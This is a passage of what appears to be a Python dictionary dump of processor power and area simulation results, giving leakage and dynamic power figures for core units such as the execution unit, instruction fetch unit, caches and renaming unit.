'Execution Unit/Complex ALUs/Peak Dynamic': 0.0651373,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.25385,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.322615,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0915637,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.147689,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0745484,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.313801,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0552605,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.51601,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0609489,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00384059,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0533436,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0284035,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114293,
'Execution Unit/Register Files/Runtime Dynamic': 0.0322441,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.128668,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.249849,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.25512,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000111944,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000111944,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000100747,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 4.07752e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000408019,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000732654,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000957397,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.027305,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.73684,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0556564,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0927402,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.03964,
'Instruction Fetch Unit/Runtime Dynamic': 0.177392,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0299556,
'L2/Runtime Dynamic': 0.0113703,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.99413,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.381695,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0244909,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.024491,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.10978,
'Load Store Unit/Runtime Dynamic': 0.526967,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0603905,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.120781,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0214328,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0218813,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.10799,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00912832,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.300917,
'Memory Management Unit/Runtime Dynamic': 0.0310096,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.5858,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.160329,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00608227,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0432225,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.209634,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.21149,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0693072,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.257126,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.342461,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0961706,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.15512,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0782991,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.329589,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0574878,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.55687,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0646982,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00403382,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.056411,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0298326,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.121109,
'Execution Unit/Register Files/Runtime Dynamic': 0.0338664,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.136173,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.263012,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.28897,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000109436,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000109436,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 9.88976e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 4.02425e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000428548,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000746316,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000921373,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0286788,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.82422,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0595382,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0974063,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.13127,
'Instruction Fetch Unit/Runtime Dynamic': 0.187291,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.027411,
'L2/Runtime Dynamic': 0.00854577,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.01309,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.386277,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0251045,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0251044,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.13164,
'Load Store Unit/Runtime Dynamic': 0.535188,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0619034,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.123807,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0219697,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0223797,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.113423,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00976526,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.307272,
'Memory Management Unit/Runtime Dynamic': 0.032145,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7439,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.170192,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00641015,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0453527,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.221954,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.27409,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 7.213421027751713,
